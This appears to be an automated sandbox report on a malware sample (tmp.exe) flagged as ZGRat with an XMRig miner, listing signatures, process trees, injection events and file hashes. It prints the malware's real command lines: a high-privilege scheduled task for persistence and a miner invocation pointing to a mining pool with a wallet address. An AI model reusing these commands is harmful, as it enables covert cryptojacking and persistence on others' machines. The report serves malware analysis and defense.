Analysis
-
max time kernel
150s -
max time network
143s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
27-01-2024 07:29
Behavioral task
behavioral1
Sample
tmp.exe
Resource
win7-20231215-en
General
-
Target
tmp.exe
-
Size
5.6MB
-
MD5
1a27bd843a09f923661a15300e02d703
-
SHA1
5cb66b20c4cbda0cd080bb2380034d7da9cc7ce6
-
SHA256
8ee36fd8214e1c9c09721d34bc9f28ed327c09bb9b05b70581697d3329e609c1
-
SHA512
330a78e0214304d4786d8d2d98905fbff7c530042eac93ea133995661a7432c60a9bb052804598479c461da6bef4bfdbffb8a5e8cd473fd6a96ff0012ceaab05
-
SSDEEP
49152:q6orqtRW0jfH4+8MjRJHiEpxxH4vNpQXGp8mih7NUfXUu4tEqNrqcqapPeDkwVzO:foWjZG/Mul2rq/aReDkizMeQU4T
Malware Config
Signatures
-
Detect ZGRat V1 7 IoCs
resource yara_rule behavioral1/memory/1712-0-0x0000000000AC0000-0x0000000001060000-memory.dmp family_zgrat_v1 behavioral1/files/0x000c00000001272b-15.dat family_zgrat_v1 behavioral1/files/0x000c00000001272b-17.dat family_zgrat_v1 behavioral1/files/0x000c00000001272b-18.dat family_zgrat_v1 behavioral1/memory/2724-20-0x0000000000C50000-0x00000000011F0000-memory.dmp family_zgrat_v1 behavioral1/files/0x000c00000001272b-47.dat family_zgrat_v1 behavioral1/memory/1540-49-0x0000000000FE0000-0x0000000001580000-memory.dmp family_zgrat_v1 -
XMRig Miner payload 9 IoCs
resource yara_rule behavioral1/memory/2744-33-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2744-35-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2744-36-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2744-37-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2744-38-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2744-39-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2744-40-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2744-41-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig behavioral1/memory/2744-44-0x0000000140000000-0x00000001407DC000-memory.dmp xmrig -
.NET Reactor proctector 7 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/memory/1712-0-0x0000000000AC0000-0x0000000001060000-memory.dmp net_reactor behavioral1/files/0x000c00000001272b-15.dat net_reactor behavioral1/files/0x000c00000001272b-17.dat net_reactor behavioral1/files/0x000c00000001272b-18.dat net_reactor behavioral1/memory/2724-20-0x0000000000C50000-0x00000000011F0000-memory.dmp net_reactor behavioral1/files/0x000c00000001272b-47.dat net_reactor behavioral1/memory/1540-49-0x0000000000FE0000-0x0000000001580000-memory.dmp net_reactor -
Executes dropped EXE 2 IoCs
pid Process 2724 .exe 1540 .exe -
Loads dropped DLL 1 IoCs
pid Process 2376 cmd.exe -
resource yara_rule behavioral1/memory/2744-25-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2744-24-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2744-28-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2744-29-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2744-31-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2744-32-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2744-33-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2744-35-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2744-36-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2744-37-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2744-38-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2744-39-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2744-40-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2744-41-0x0000000140000000-0x00000001407DC000-memory.dmp upx behavioral1/memory/2744-44-0x0000000140000000-0x00000001407DC000-memory.dmp upx -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2724 set thread context of 2744 2724 .exe 36 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2732 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2436 timeout.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2724 .exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 468 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1712 tmp.exe Token: SeDebugPrivilege 2724 .exe Token: SeLockMemoryPrivilege 2744 vbc.exe Token: SeLockMemoryPrivilege 2744 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2744 vbc.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 1712 wrote to memory of 2376 1712 tmp.exe 28 PID 1712 wrote to memory of 2376 1712 tmp.exe 28 PID 1712 wrote to memory of 2376 1712 tmp.exe 28 PID 2376 wrote to memory of 2436 2376 cmd.exe 30 PID 2376 wrote to memory of 2436 2376 cmd.exe 30 PID 2376 wrote to memory of 2436 2376 cmd.exe 30 PID 2376 wrote to memory of 2724 2376 cmd.exe 31 PID 2376 wrote to memory of 2724 2376 cmd.exe 31 PID 2376 wrote to memory of 2724 2376 cmd.exe 31 PID 2724 wrote to memory of 2896 2724 .exe 33 PID 2724 wrote to memory of 2896 2724 .exe 33 PID 2724 wrote to memory of 2896 2724 .exe 33 PID 2896 wrote to memory of 2732 2896 cmd.exe 34 PID 2896 wrote to memory of 2732 2896 cmd.exe 34 PID 2896 wrote to memory of 2732 2896 cmd.exe 34 PID 2724 wrote to memory of 2744 2724 .exe 36 PID 2724 wrote to memory of 2744 2724 .exe 36 PID 2724 wrote to memory of 2744 2724 .exe 36 PID 2724 wrote to memory of 2744 2724 .exe 36 PID 2724 wrote to memory of 2744 2724 .exe 36 PID 2724 wrote to memory of 2744 2724 .exe 36 PID 2724 wrote to memory of 2744 2724 .exe 36 PID 2596 wrote to memory of 1540 2596 taskeng.exe 40 PID 2596 wrote to memory of 1540 2596 taskeng.exe 40 PID 2596 wrote to memory of 1540 2596 taskeng.exe 40 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1712 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp4A68.tmp.bat""2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:2436
-
-
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"5⤵
- Creates scheduled task(s)
PID:2732
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2744
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {5D120DE0-8174-4FAF-B86B-0040BC875CC5} S-1-5-21-3308111660-3636268597-2291490419-1000:JUBFGPHD\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exeC:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe2⤵
- Executes dropped EXE
PID:1540
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
516KB
MD59c2e032da35338d8425628604724619d
SHA12425eef3498cea74ec8a50bce04a03a9fff25b39
SHA256b7822a19098b897ff8c0703947bc9526117112bbe806169254328a02fd627761
SHA512d48e507a7fa0a71bcab3ae618fd4f9ea9292efadc5dafa046908d6c50ae6b4ee733296895bea0f392b3cbfa8d52637d241a81f8005af0b4cba0338065a9bbb0a
-
Filesize
1.1MB
MD5b6db633f3767bcf9f6ea46d8c639dbaf
SHA180ff3244ec26a4df2fc83457787bef729777db1a
SHA2566ffb9fddf406dfc205a796e57abde78ecabc0632d0a978afe48e1b2451afb460
SHA5122950f36c4470d9f526a2b0efad16bba379c765e1e28233ff42b012b2c9c92071cbe377a5b331245ee9270ebfb6badda044eb3217067d82f85543ced1510ad4eb
-
Filesize
2.3MB
MD5dcf9bca0435902cb680a565b4f2a6d5e
SHA146bd07845bbb51ce8c55086ceda62e17a7b39b24
SHA256ac490ff54701f5edbdfcd98d117ea28a1ef7915a58895ec95d8d03d5cecb4735
SHA512d53f6f8007db0d590bd9c9341647c9608b579a8ecd9eb6c64578ad6819dcadd4b97804c1384f94b3b98d8137f40dce86d61531c6bb5d3b87512b91d063cef413
-
Filesize
168B
MD5bf1de5b9a349c4850b8211b32b913a3f
SHA1a8e473e760e1c62c3d308a645702fea9bd708526
SHA256d1fcd7083e98738c568bec99cf66f0ae9cfb02f58526d14d53eb2d8f0da0c91d
SHA5123825e432f9e55f15a51d1b28559a878f20f866c19d26a92148f9715aa3323ad5ae00c2269280ad3cad927ab62608e74f84e92ca6ee954b58ff467f53db4f783a
-
Filesize
704KB
MD537c13620d85077d7c2887d611263910a
SHA1cf28eeef489a520717d257d97e4899c488a3bc77
SHA256753b6b69ad6eaa6f452c07b2c9307297771037733398cc85fe9bfb1b518edfac
SHA512b5fb547fc281103b895378a7b21b53cb837c75c6b8d529111f38c27e6c0d6a1a99cf449a9420d587358795c5a9d614504aea9db8208f7a8d6c925329db2f8bb1